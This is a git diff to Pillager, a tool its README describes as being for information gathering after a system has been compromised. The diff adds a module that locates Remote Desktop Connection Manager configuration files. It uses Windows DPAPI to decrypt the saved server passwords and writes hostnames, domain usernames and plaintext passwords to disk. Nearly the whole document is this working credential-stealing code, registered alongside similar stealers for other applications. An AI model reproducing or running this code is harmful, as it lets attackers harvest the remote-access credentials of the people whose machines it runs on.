diff --git a/Pillager/Pillager.csproj b/Pillager/Pillager.csproj
index 7101166..991ee2a 100644
--- a/Pillager/Pillager.csproj
+++ b/Pillager/Pillager.csproj
@@ -77,6 +77,7 @@
+
diff --git a/Pillager/Program.cs b/Pillager/Program.cs
index 1bbf418..5a0f6e8 100644
--- a/Pillager/Program.cs
+++ b/Pillager/Program.cs
@@ -30,6 +30,7 @@ namespace Pillager
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
Navicat.Save(savepath);
+ RDCMan.Save(savepath);
//Messengers
QQ.Save(savepath);
diff --git a/Pillager/Tools/RDCMan.cs b/Pillager/Tools/RDCMan.cs
new file mode 100644
index 0000000..a48fd76
--- /dev/null
+++ b/Pillager/Tools/RDCMan.cs
@@ -0,0 +1,114 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Security.Cryptography;
+using System.Text;
+using System.Xml;
+
+namespace Pillager.Tools
+{
+ internal class RDCMan
+ {
+ public static string ToolName = "RDCMan";
+
+ public static string DecryptPwd()
+ {
+ StringBuilder sb = new StringBuilder();
+ var RDGFiles = new List();
+ var RDCManSettings = new XmlDocument();
+ string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
+ RDCManSettings.LoadXml(File.ReadAllText(rdgPath));
+ var nodes = RDCManSettings.SelectNodes("//FilesToOpen");
+ foreach (XmlNode node in nodes)
+ {
+ var RDGFilePath = node.InnerText;
+ if (!RDGFiles.Contains(RDGFilePath))
+ {
+ RDGFiles.Add(RDGFilePath);
+ }
+ }
+ foreach (string RDGFile in RDGFiles)
+ {
+ sb.AppendLine(ParseRDGFile(RDGFile));
+ }
+ return sb.ToString();
+ }
+
+ private static string DecryptPassword(string password)
+ {
+ byte[] passwordBytes = Convert.FromBase64String(password);
+ password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser)).Replace("\0", "");
+ return password;
+ }
+
+ private static string ParseRDGFile(string RDGPath)
+ {
+ StringBuilder stringBuilder = new StringBuilder();
+ try
+ {
+ XmlDocument RDGFileConfig = new XmlDocument();
+ RDGFileConfig.LoadXml(File.ReadAllText(RDGPath));
+ XmlNodeList nodes = RDGFileConfig.SelectNodes("//server");
+ foreach (XmlNode node in nodes)
+ {
+ string hostname = string.Empty, profilename = string.Empty, username = string.Empty, password = string.Empty, domain = string.Empty;
+ foreach (XmlNode subnode in node)
+ {
+ foreach (XmlNode subnode_1 in subnode)
+ {
+ switch (subnode_1.Name)
+ {
+ case "name":
+ hostname = subnode_1.InnerText;
+ break;
+ case "profileName":
+ profilename = subnode_1.InnerText;
+ break;
+ case "userName":
+ username = subnode_1.InnerText;
+ break;
+ case "password":
+ password = subnode_1.InnerText;
+ break;
+ case "domain":
+ domain = subnode_1.InnerText;
+ break;
+ }
+ }
+ }
+
+ if (!string.IsNullOrEmpty(password))
+ {
+ var decrypted = DecryptPassword(password);
+ if (!string.IsNullOrEmpty(decrypted))
+ {
+ stringBuilder.AppendLine("hostname: " + hostname);
+ stringBuilder.AppendLine("profilename: " + profilename);
+ stringBuilder.AppendLine("username: " + $"{domain}\\{username}");
+ stringBuilder.AppendLine("decrypted: " + decrypted);
+ stringBuilder.AppendLine();
+ }
+ }
+ }
+ }
+ catch { }
+ return stringBuilder.ToString();
+ }
+
+ public static void Save(string path)
+ {
+ try
+ {
+ string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
+ if (!File.Exists(rdgPath)) return;
+ string savepath = Path.Combine(path, ToolName);
+ Directory.CreateDirectory(savepath);
+ string output = DecryptPwd();
+ if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
+ }
+ catch { }
+ }
+ }
+}
diff --git a/README.md b/README.md
index 66248d1..e64ba67 100644
--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
| MobaXterm | Password/Credential |
| Xmanager | Password |
| Navicat | Password |
+| RDCMan | Password |
| Others | Support |
| :----: | :------: |